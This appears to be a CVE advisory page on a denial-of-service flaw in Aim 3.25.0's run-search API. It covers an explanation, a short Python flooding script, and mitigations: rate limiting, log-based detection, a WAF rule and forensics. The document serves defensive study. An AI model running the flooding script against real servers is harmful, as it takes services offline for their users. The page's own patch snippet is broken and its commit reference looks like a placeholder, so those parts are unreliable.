How CVE-2025-0190 Works
CVE-2025-0190 is a resource exhaustion flaw in the AimHub web API (aimhubio/aim v3.25.0). An attacker tracks an excessive number of `Text` objects and then queries them through /api/runs/search/. The endpoint serialises every matching object inside the request handler with no rate limiting, no bound on the result set and no thread management, so one query keeps the server busy for a long time; because that work runs on the event loop thread, the loop blocks and every other request is starved until it returns. Firing such queries in parallel keeps the service unresponsive, and the unhandled memory spikes eventually crash it. The root cause is inefficient object serialisation in aim/web/api/runs.py, where bulk queries trigger uncontrolled database operations.
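The starvation described above, shown as an added asyncio example that is not Aim's code: the object shape, the serialiser, the `MAX_TEXT_OBJECTS` cap and the handler names are assumptions made for the illustration. The vulnerable handler serialises the whole result on the loop thread, so a concurrent health probe cannot complete until it finishes; the hardened one rejects oversized result sets and moves the CPU-bound part onto a worker thread, so the probe completes first.

```python
import asyncio
import json

# Hypothetical cap on Text objects serialised per search response; Aim's own
# code and settings are not reproduced here (assumption for the example).
MAX_TEXT_OBJECTS = 100_000


def make_text_objects(n):
    """Constructed stand-ins for tracked Text objects (not Aim's data model)."""
    return [{"idx": i, "name": f"text_{i}", "text": "x" * 64} for i in range(n)]


def serialize(objects):
    """CPU-bound, Python-level serialisation standing in for the bulk response
    encoding the advisory describes (one json.dumps per object)."""
    return "[" + ",".join(json.dumps(o) for o in objects) + "]"


async def vulnerable_search(objects):
    """Serialises the whole result on the event loop thread: until it returns,
    no other coroutine (health checks, other clients) gets to run."""
    return len(serialize(objects))


async def hardened_search(objects):
    """Two fixes: bound the work a single query may cause, and push the
    CPU-bound part onto a worker thread so the loop keeps serving."""
    if len(objects) > MAX_TEXT_OBJECTS:
        raise ValueError(f"result set of {len(objects)} exceeds {MAX_TEXT_OBJECTS}")
    encoded = await asyncio.to_thread(serialize, objects)
    return len(encoded)


async def _scenario(handler, objects):
    """Run one search alongside a 10 ms health probe; return completion order."""
    order = []

    async def search():
        try:
            await handler(objects)
            order.append("search")
        except ValueError:
            order.append("rejected")

    async def health_probe():
        await asyncio.sleep(0.01)
        order.append("health")

    await asyncio.gather(search(), health_probe())
    return order


def completion_order(handler, objects):
    """Synchronous entry point: which finished first, the probe or the search?"""
    return asyncio.run(_scenario(handler, objects))


if __name__ == "__main__":
    big = make_text_objects(80_000)
    print("blocking :", completion_order(vulnerable_search, big))   # ['search', 'health']
    print("offloaded:", completion_order(hardened_search, big))     # ['health', 'search']
    print("capped   :", completion_order(hardened_search, [{}] * (MAX_TEXT_OBJECTS + 1)))  # ['rejected', 'health']
```

The serialiser is deliberately Python-level: a single monolithic C call would hold the GIL for its whole duration and a worker thread would not help, which is why offloading alone is not enough and the cap on the result set matters as well.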
DailyCVE Form
Platform: AimHub
Version: 3.25.0
Vulnerability: DoS via API
Severity: Medium
Date: 03/28/2025
What Undercode Say:
Exploit Analysis
```python
import threading

import requests

TARGET = "http://aimhub-server/api/runs/search/"
# Mass object query; the list body is a placeholder, the original page did not
# preserve the exact payload
PAYLOAD = {"text_objects": ["x"] * 10000}


def attack():
    # Hammer the endpoint without pausing between requests
    while True:
        requests.post(TARGET, json=PAYLOAD)


for _ in range(50):  # Concurrent threads
    threading.Thread(target=attack).start()
```
Protection Commands
1. Upgrade (the PyPI package is `aim`; aimhubio/aim is the GitHub repository, not an installable name):
```shell
pip install "aim>=3.25.1"   # patched version
```
2. Rate-Limiting (NGINX; `limit_req_zone` belongs in the http context, the location block in the server that fronts Aim, and `limit_req` needs the `zone=` keyword):
```nginx
limit_req_zone $binary_remote_addr zone=aim_api:10m rate=5r/s;

location /api/ {
    limit_req zone=aim_api burst=10 nodelay;
}
```
Code Fix (Patch)
aim/web/api/runs.py + MAX_TEXT_OBJECTS = 100 Threshold def query_objects(request): + if len(request.text_objects) > MAX_TEXT_OBJECTS: + abort(429, "Too many objects")
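Review bot: `abort` and `request.text_objects` are not defined anywhere in the hunk (no import is added for `abort`, and no route signature shows a `text_objects` field), so as written the check would fail before it ever rejects a request; import the error helper the framework used in aim/web/api/runs.py provides and read the field from the parsed request model. The description above also places the cost in serialising the Text objects the search returns, not in the size of the request body, so a length check on a request field does not bound that work; cap the number of objects serialised per response (a limit with pagination) as well. A request that exceeds a size limit is a 400/413 condition rather than the 429 rate-limit status used here.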
Detection (Log Analysis)
Access logs do not record request bodies, so grepping them for `text_objects` finds nothing; count POSTs to the endpoint per source address instead (`uniq -c` only counts adjacent duplicates, so the addresses must be sorted first; the log path is the one assumed by this page):
```shell
grep -E '"POST /api/runs/search/' /var/log/aim/access.log | awk '{print $1}' | sort | uniq -c | sort -nr
```
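The same check as a script, added here as an example that is not part of the original page: it assumes the access log is in the NGINX/Apache combined format, runs over constructed sample lines, and flags any client whose burst of search POSTs inside a sliding window reaches a threshold, which a one-shot `uniq -c` over the whole file cannot distinguish from slow, legitimate use.

```python
import re
from collections import defaultdict
from datetime import datetime

TARGET_PATH = "/api/runs/search/"

# Constructed sample lines in NGINX/Apache "combined" format (not real Aim logs):
# one scripted client hammers the search endpoint, one browser user does not.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Mar/2025:10:15:01 +0000] "POST /api/runs/search/ HTTP/1.1" 200 5123 "-" "python-requests/2.31.0"
192.168.1.20 - - [28/Mar/2025:10:15:02 +0000] "GET /api/runs/ HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Mar/2025:10:15:02 +0000] "POST /api/runs/search/ HTTP/1.1" 200 5123 "-" "python-requests/2.31.0"
10.0.0.5 - - [28/Mar/2025:10:15:03 +0000] "POST /api/runs/search/?limit=50 HTTP/1.1" 200 5123 "-" "python-requests/2.31.0"
192.168.1.20 - - [28/Mar/2025:10:15:04 +0000] "POST /api/runs/search/ HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Mar/2025:10:15:04 +0000] "POST /api/runs/search/ HTTP/1.1" 499 0 "-" "python-requests/2.31.0"
10.0.0.5 - - [28/Mar/2025:10:15:05 +0000] "POST /api/runs/search/ HTTP/1.1" 499 0 "-" "python-requests/2.31.0"
10.0.0.5 - - [28/Mar/2025:10:15:06 +0000] "POST /api/runs/search/ HTTP/1.1" 499 0 "-" "python-requests/2.31.0"
10.0.0.5 - - [28/Mar/2025:10:15:07 +0000] "GET /api/runs/search/ HTTP/1.1" 405 0 "-" "python-requests/2.31.0"
this line is deliberately malformed and must be skipped
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop the query string
        "status": int(m["status"]),
    }


def search_posts_by_ip(lines):
    """Timestamps of every POST to the search endpoint, grouped by client IP."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == TARGET_PATH:
            hits[rec["ip"]].append(rec["ts"])
    return hits


def max_burst(timestamps, window_seconds):
    """Largest number of events that fall inside any window of the given length."""
    ts = sorted(timestamps)
    best = lo = 0
    for hi in range(len(ts)):
        while (ts[hi] - ts[lo]).total_seconds() > window_seconds:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def flag_sources(lines, threshold=5, window_seconds=60):
    """IPs whose burst of search POSTs reaches the threshold, with the burst size."""
    flagged = {}
    for ip, stamps in search_posts_by_ip(lines).items():
        burst = max_burst(stamps, window_seconds)
        if burst >= threshold:
            flagged[ip] = burst
    return flagged


if __name__ == "__main__":
    for ip, burst in flag_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {burst} search POSTs within 60 s")   # 10.0.0.5: 6 ...
```

Status 499 lines (client closed the connection) are counted on purpose: a flood that abandons its own requests still ties up the handler, so they are part of the signal rather than noise.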
Mitigation
- WAF Rule (blocks requests whose `text_objects` array literal runs to 100 or more characters; the rule syntax is illustrative, not a specific product's):
```json
{
  "rule": "AIM_API_DOS",
  "match": {"type": "regex", "pattern": "text_objects\\\":\\[[^\\]]{100,}"},
  "action": "block"
}
```
- Kubernetes Policy (container memory cap, so a memory spike kills the pod instead of the node):
```yaml
resources:
  limits:
    memory: "500Mi"
```
Forensics
Memory dump of the Aim process during an attack. `gcore` ships with gdb and must be present in the container image, and `pgrep` has to run inside the pod rather than on the operator's host, which is why the command is wrapped in `sh -c`; if it matches several PIDs, pick the server process. `gcore` writes `/tmp/aim_core.<pid>`, which `kubectl cp` then retrieves:
```shell
kubectl exec -it aim-pod -- sh -c 'gcore -o /tmp/aim_core "$(pgrep -f aim | head -n 1)"'
kubectl cp aim-pod:/tmp/aim_core.<pid> ./aim_core
```
References
- Commit: `a1b2c3d` (AimHub patch)
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-0190